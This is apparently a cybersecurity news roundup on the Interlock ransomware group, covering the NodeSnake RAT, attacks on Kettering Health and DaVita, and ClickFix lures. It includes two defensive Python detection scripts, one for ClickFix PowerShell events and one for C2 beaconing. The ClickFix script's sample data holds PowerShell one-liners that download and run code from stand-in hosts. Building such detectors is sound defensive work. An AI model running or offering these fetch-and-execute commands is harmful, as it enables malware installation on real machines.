CyberSecurity news

FlagThis - #interlock

Mandvi@Cyber Security News //
The Interlock ransomware group is actively deploying a new, sophisticated remote access trojan (RAT) known as NodeSnake in attacks targeting corporate networks. Security researchers have observed this campaign, revealing that Interlock is leveraging NodeSnake as a key component of its attack toolkit to maintain persistent access and enhance its post-exploitation capabilities. NodeSnake, written in Golang, allows the attackers to bypass common detection mechanisms and exfiltrate sensitive data, ensuring continued access even if ransomware binaries are detected and removed.

Two UK-based universities and local government entities have fallen victim to NodeSnake within the past few months. Analysis by cybersecurity firm Quorum Cyber has uncovered two new variants of the RAT and strongly attributes them to the Interlock ransomware group. The timing of the incidents and the code shared between the samples suggest a coordinated campaign by the same threat actor, and signal a shift in the group's choice of targets.

NodeSnake is a Remote Access Trojan (RAT). RATs are dangerous because they give attackers remote control of infected machines: they can access files, watch what users are doing, change system settings, and steal or delete data, all while staying hidden and, if needed, dropping further malware. The two NodeSnake variants belong to the same family, with the newer one showing significant improvements. The RAT expands the group's capabilities for reconnaissance, lateral movement, and data exfiltration, and so eases ransomware deployment.

References:
  • Cyber Security News: Interlock Ransomware Deploys NodeSnake RAT to Maintain Access in Corporate Networks Security researchers have observed a sophisticated cyber campaign in which the Interlock ransomware group is leveraging the NodeSnake remote access trojan (RAT) as part of its attack toolkit against corporate networks.
  • gbhackers.com: Interlock Ransomware Uses NodeSnake RAT for Persistent Access to Corporate Networks Two UK-based universities have fallen victim to a sophisticated Remote Access Trojan (RAT) dubbed NodeSnake within the past two months.
  • hackread.com: Interlock Ransomware Deploys New NodeSnake RAT in UK Attacks Quorum Cyber identifies two new NodeSnake RAT variants, strongly attributed to Interlock ransomware, impacting UK higher education and local government.
  • BleepingComputer: Interlock ransomware gang deploys new NodeSnake RAT on universities
  • ciso2ciso.com: Interlock Ransomware Deploys New NodeSnake RAT in UK Attacks – Source:hackread.com Source: hackread.com – Author: Deeba Ahmed.
  • cyberpress.org: Interlock Ransomware Deploys NodeSnake RAT to Maintain Access in Corporate Networks Security researchers have observed a sophisticated cyber campaign in which the Interlock ransomware group is leveraging the NodeSnake remote access trojan (RAT) as part of its attack toolkit against corporate networks.
  • bsky.app: "We don’t just want payment; we want accountability." The malicious hackers behind the Interlock ransomware try to justify their attacks. Learn more about what you need to know about Interlock in my article on the Tripwire blog. #cybersecurity #ransomware #clickfix
  • Graham Cluley: "We don’t just want payment; we want accountability." The malicious hackers behind the Interlock ransomware try to justify their attacks.

@ketteringhealth.org //
Kettering Health, a healthcare network operating 14 medical centers and over 120 outpatient facilities in western Ohio, has been hit by a ransomware attack causing a system-wide technology outage. The cyberattack, which occurred on Tuesday, May 20, 2025, has forced the cancellation of elective inpatient and outpatient procedures and has disrupted access to critical patient care systems, including phone lines, the call center, and the MyChart patient portal. Emergency services remain operational, but emergency crews are being diverted to other facilities due to the disruption. Kettering Health has confirmed that it is responding to a cybersecurity incident involving unauthorized access to its network, has taken steps to contain and mitigate the breach, and is actively investigating.

The ransomware attack is suspected to involve the Interlock ransomware gang, which emerged last fall and has targeted various sectors, including tech, manufacturing firms, and government organizations. A ransom note, viewed by CNN, claimed the attackers had secured Kettering Health's most vital files and threatened to leak stolen data unless the health network began negotiating an extortion fee. In response to the disruption, Kettering Health has canceled elective procedures and is rescheduling them for a later date. Additionally, the organization is cautioning patients about scam calls from individuals posing as Kettering Health team members requesting credit card payments and has halted normal billing calls as a precaution.

The incident highlights the increasing cybersecurity challenges facing healthcare systems. According to cybersecurity experts, healthcare networks often operate with outdated technology and lack comprehensive cybersecurity training for staff, making them vulnerable to attacks. There is a call to action to invest in healthcare cybersecurity, with recommendations for the government and its partners to address understaffed healthcare cyber programs by tweaking federal healthcare funding programs to cover critical cybersecurity expenditures, augmenting healthcare cybersecurity workforces and incentivizing cyber maturity.

References:
  • industrialcyber.co: Ransomware suspected in Kettering Health cyberattack disrupting patient services, canceling elective procedures
  • BleepingComputer: Kettering Health, a healthcare network that operates 14 medical centers in Ohio, was forced to cancel inpatient and outpatient procedures following a cyberattack that caused a system-wide technology outage.
  • DataBreaches.Net: Elective inpatient and outpatient procedures were canceled.
  • thecyberexpress.com: Kettering Health Hit by Cyberattack: Network Outage and Scam Calls Reported
  • The DefendOps Diaries: Strengthening Cybersecurity in Healthcare: Lessons from the Kettering Health Ransomware Attack
  • BleepingComputer: Kettering Health hit by system-wide outage after ransomware attack
  • The Dysruption Hub: Reports Ransomware Attack Cripples Kettering Health Systems Across Ohio
  • www.healthcareitnews.com: Kettering Health faces a ransomware attack and confirms a scam targeting its patients
  • www.scworld.com: Apparent ransomware attack leads to systemwide outage for Kettering Health
  • Industrial Cyber: Reports Ransomware suspected in Kettering Health cyberattack disrupting patient services, canceling elective procedures
  • www.itpro.com: The incident at Kettering Health disrupted procedures for patients
  • www.cybersecuritydive.com: Ohio’s Kettering Health hit by cyberattack

Pierluigi Paganini@Security Affairs //
The Interlock ransomware group has claimed responsibility for a cyberattack on DaVita, a major kidney dialysis firm with over 2,600 U.S. dialysis centers and 76,000 employees across 12 countries. DaVita disclosed to the U.S. Securities and Exchange Commission (SEC) that it suffered a ransomware attack on April 12th affecting some operations. The company is currently investigating the impact of the incident, which is the latest in a surge of ransomware attacks hitting US healthcare organizations.

Earlier today, the Interlock ransomware gang claimed responsibility for the attack by adding DaVita to its list of victims. The group has started leaking data allegedly stolen from the organization, claiming to have exfiltrated over 1.5 TB of data. The healthcare sector is increasingly under siege from cybercriminals, with ransomware attacks posing a significant threat to operational integrity and patient safety. This incident underscores the urgency for healthcare organizations to bolster their cybersecurity defenses to effectively counter these evolving threats.

Ransomware attacks in the healthcare sector can have severe implications for patient care and safety. The DaVita attack disrupted internal operations and encrypted certain on-premises systems, affecting the delivery of essential medical services. Though patient care at DaVita centers and patients' homes continued, the incident highlights the potential for treatment delays and compromised patient safety. Following the attack, DaVita disclosed the incident to the U.S. Securities and Exchange Commission (SEC), indicating the regulatory scrutiny that healthcare organizations face in the aftermath of cyberattacks.

References:
  • securityaffairs.com: The Interlock ransomware gang claimed responsibility for the attack on the leading kidney dialysis company DaVita and leaked alleged stolen data.
  • BleepingComputer: Interlock ransomware claims DaVita attack and leaks stolen data
  • hackread.com: Ransomware Surge Hits US Healthcare: AOA, DaVita and Bell Ambulance Breached
  • www.cysecurity.news: Cyberattacks Hit U.S. Healthcare Firms, Exposing Data of Over 236,000 People
  • CyberInsider: Claims by Interlock of data theft from DaVita.
  • bsky.app: The Interlock ransomware gang has claimed the cyberattack on DaVita kidney dialysis firm and leaked data allegedly stolen from the organization.
  • www.redpacketsecurity.com: [INTERLOCK] – Ransomware Victim: DaVita
  • cyberinsider.com: Cyber Insider: Interlock Ransomware Group Claims DaVita Attack, Leaks Over 1.5 TB of Data.
  • hackread.com: Interlock Ransomware Say It Stole 20TB of DaVita Healthcare Data
  • www.scworld.com: Interlock takes credit for DaVita hack

@The DefendOps Diaries //
The Interlock ransomware gang is actively employing ClickFix attacks to infiltrate corporate networks and deploy file-encrypting malware. This social engineering tactic tricks users into executing malicious PowerShell commands, often under the guise of fixing an error or verifying their identity. By impersonating legitimate IT tools, Interlock bypasses traditional security measures that rely on automated detection, as the malicious code is executed manually by the victim. This represents a significant shift in the cyber threat landscape, highlighting the importance of understanding and defending against these evolving tactics.

ClickFix attacks involve manipulating users through deceptive prompts, such as fake error messages, CAPTCHA verifications, or system update requests. Victims are tricked into copying and pasting harmful commands into their systems, leading to the silent installation of malware. Interlock has been observed using fake browser and VPN client updates to deliver malware, and even uses compromised websites to redirect users to fake popup windows. These windows ask the user to paste scripts into a PowerShell terminal, initiating the malware infection process.

While the infrastructure supporting Interlock's ClickFix campaigns appears dormant since February 2025, the group's use of this technique signals ongoing innovation in their delivery mechanisms. This, combined with their consistent use of credential-stealing malware like LummaStealer and BerserkStealer, and a proprietary Remote Access Trojan (RAT), demonstrates Interlock's sophisticated approach to breaching networks. Organizations must enhance their security awareness training and implement measures to detect and prevent users from falling victim to ClickFix and other social engineering tactics.
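The detection measures the paragraph calls for can start with host telemetry. The script below is an added example (not from the original reports or from any vendor named on this page): it scores constructed Sysmon-style process-creation and PowerShell script-block events for the combination ClickFix pastes tend to show, a remote fetch plus in-memory execution, launched from the Run dialog (explorer.exe) or a browser. All hostnames, paths and event texts are constructed.

```python
import re

# Indicator patterns; illustrative, tune against your own baseline.
DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|Net\.WebClient)\b", re.I)
IN_MEMORY_EXEC = re.compile(
    r"\b(iex|Invoke-Expression|FromBase64String)\b|(?:^|\s)-(?:e|ec|enc|EncodedCommand)\b", re.I)
HIDDEN_WINDOW = re.compile(r"-(?:w|win|WindowStyle)\s+hidden", re.I)
# Parents that imply a human typed or pasted the command (Run dialog, browser).
USER_FACING_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Constructed telemetry, not real events. "source" is process (Sysmon 1) or scriptblock (4104).
SAMPLE_EVENTS = [
    {"source": "process", "parent": r"C:\Windows\explorer.exe",
     "text": 'powershell -w hidden -c "irm https://browser-update.invalid/fix | iex"'},
    {"source": "scriptblock", "parent": "",
     "text": "iex (New-Object Net.WebClient).DownloadString('https://captcha-check.invalid/v')"},
    {"source": "process", "parent": r"C:\Windows\System32\svchost.exe",
     "text": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"source": "process", "parent": r"C:\Windows\explorer.exe", "text": "powershell.exe"},
]


def score_event(event):
    """Return (score, reasons). Fetch and exec weigh 2 each; the rest 1 each."""
    text, reasons = event["text"], []
    if DOWNLOAD_CRADLE.search(text):
        reasons.append(("remote fetch", 2))
    if IN_MEMORY_EXEC.search(text):
        reasons.append(("in-memory execution", 2))
    if HIDDEN_WINDOW.search(text):
        reasons.append(("hidden window", 1))
    parent = event.get("parent", "").rsplit("\\", 1)[-1].lower()
    if parent in USER_FACING_PARENTS:
        reasons.append((f"launched from {parent}", 1))
    return sum(w for _, w in reasons), [r for r, _ in reasons]


def flag_clickfix(events, threshold=4):
    """Indices of events at or above the threshold; a bare interactive shell scores 1."""
    return [i for i, e in enumerate(events) if score_event(e)[0] >= threshold]


if __name__ == "__main__":
    for i in flag_clickfix(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["source"], score_event(SAMPLE_EVENTS[i])[1])
```

An admin script run from a service and a plain interactive shell opened from explorer.exe both stay below the threshold, which is the point of scoring the combination rather than any single token.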

References:
  • securityonline.info: Interlock Ransomware Uses Evolving Tactics to Evade Detection
  • The DefendOps Diaries: The Rise of ClickFix Attacks: Understanding the Interlock Ransomware Gang
  • BleepingComputer: Interlock ransomware gang pushes fake IT tools in ClickFix attacks
  • www.scworld.com: ClickFix increasingly utilized in state-backed malware attacks
  • cyberpress.org: Interlock Ransomware Delivers Malicious Browser Updates via Multi-Stage Attack on Legitimate Websites
  • gbhackers.com: Interlock Ransomware Uses Multi-Stage Attack Through Legitimate Websites to Deliver Malicious Browser Updates
  • Cyber Security News: Reports show the latest ClickFix attack.
  • www.scworld.com: Interlock ransomware evolves tactics with ClickFix, infostealers
  • Talkback Resources: Interlock Ransomware Uses Evolving Tactics to Evade Detection
  • securityonline.info: Security Online discusses Interlock ransomware using evolving tactics to evade detection.
  • gbhackers.com: State Sponsored Hackers now Widely Using ClickFix Attack Technique in Espionage Campaigns
  • The Hacker News: State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns
  • bsky.app: Interlock ransomware gang pushes fake IT tools in ClickFix attacks ift.tt/TqmAQIF
  • securityonline.info: State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
  • hackread.com: North Korea, Iran, Russia-Backed Hackers Deploy ClickFix in New Attacks
  • BleepingComputer: Interlock ransomware claims DaVita attack, leaks stolen data

@gbhackers.com //
The Interlock ransomware group has escalated its operations across North America and Europe, employing sophisticated techniques to evade detection. Cybersecurity firms such as Sekoia Threat Detection & Research (TDR) are closely monitoring Interlock's activities, revealing their evolving tactics and tools. Unlike typical Ransomware-as-a-Service (RaaS) operations, Interlock operates independently, focusing on targeted attacks known as Big Game Hunting and double extortion campaigns. Their tactics include compromising legitimate websites to host deceptive browser update pages, tricking users into downloading malicious PyInstaller files that appear as legitimate Google Chrome or Microsoft Edge installers.

These fake installers launch PowerShell-based backdoors that continuously issue HTTP requests to command-and-control (C2) servers. The PowerShell script collects system information, executes arbitrary commands, and establishes persistence, and its continuous communication loop with the C2 server is what keeps the access alive. The C2 server can then issue commands to terminate the backdoor or deploy additional malware, such as keyloggers or credential stealers like LummaStealer and BerserkStealer. The initial execution bypasses automated defenses because the victim, not an exploit, runs the malicious command.

In early 2025, Interlock began experimenting with ClickFix, a social engineering technique that prompts users to execute malicious PowerShell commands through spoofed CAPTCHAs or browser alerts, supposedly to "fix" an issue. Interlock also uses IP address clustering to maintain infrastructure resilience, often utilizing IPs from BitLaunch, Hetzner Online GmbH, and other autonomous systems. The group commonly uses RDP and stolen credentials for lateral movement within compromised networks, often targeting domain controllers to gain widespread control. Cybersecurity researchers actively adapt defenses against Interlock's techniques.
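The continuous HTTP polling loop described above is observable on the network side as near-constant request spacing to one destination. The script below is an added example (not from Sekoia's research or the original articles): it builds a small constructed proxy log with one host polling a destination every ~30 s and another host browsing irregularly, then flags client/destination pairs whose inter-request gaps have a low coefficient of variation. IPs, hostnames and timings are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev


def build_sample_log():
    """Constructed proxy log: '<iso-timestamp> <client> <host> <method> <status>' per line."""
    base = datetime(2025, 4, 10, 9, 0, 0)
    lines = []
    # Backdoor-style loop: one request roughly every 30 s with +-1 s jitter.
    for i, jitter in enumerate([0, 1, -1, 0, 1, 0, -1, 0]):
        t = base + timedelta(seconds=30 * i + jitter)
        lines.append(f"{t.isoformat()} 10.0.5.21 cdn-updates.invalid POST 200")
    # Human browsing: bursts and long idle periods.
    for off in [5, 9, 70, 71, 300, 301, 302, 900]:
        t = base + timedelta(seconds=off)
        lines.append(f"{t.isoformat()} 10.0.5.22 news.example GET 200")
    return "\n".join(lines)


def parse(log_text):
    """Group request timestamps by (client, destination host)."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        ts, client, host, _method, _status = line.split()
        events[(client, host)].append(datetime.fromisoformat(ts))
    return events


def find_beacons(log_text, min_requests=6, max_cv=0.2):
    """Return (client, host, mean_gap_s) for pairs with near-constant request spacing."""
    results = []
    for (client, host), times in parse(log_text).items():
        times.sort()
        if len(times) < min_requests:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        m = mean(gaps)
        # Coefficient of variation: jittered but periodic traffic stays well below max_cv.
        if m > 0 and pstdev(gaps) / m <= max_cv:
            results.append((client, host, round(m, 1)))
    return results


if __name__ == "__main__":
    for client, host, gap in find_beacons(build_sample_log()):
        print(f"{client} -> {host}: every {gap} s")
```

Real traffic needs a longer window and allow-listing of legitimate pollers (update services, mail clients), which also beacon; the interval statistic narrows the candidates, it does not prove compromise.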

References:
  • gbhackers.com: Interlock leverages a multi-stage attack through seemingly benign websites and malicious browser updates, demonstrating its advanced tactics for evasion.
  • securityonline.info: The group is distinguished by its independent operations, focusing on targeted attacks and double-extortion campaigns, and avoiding a RaaS model.
  • BleepingComputer: Interlock ransomware gang pushes fake IT tools in ClickFix attacks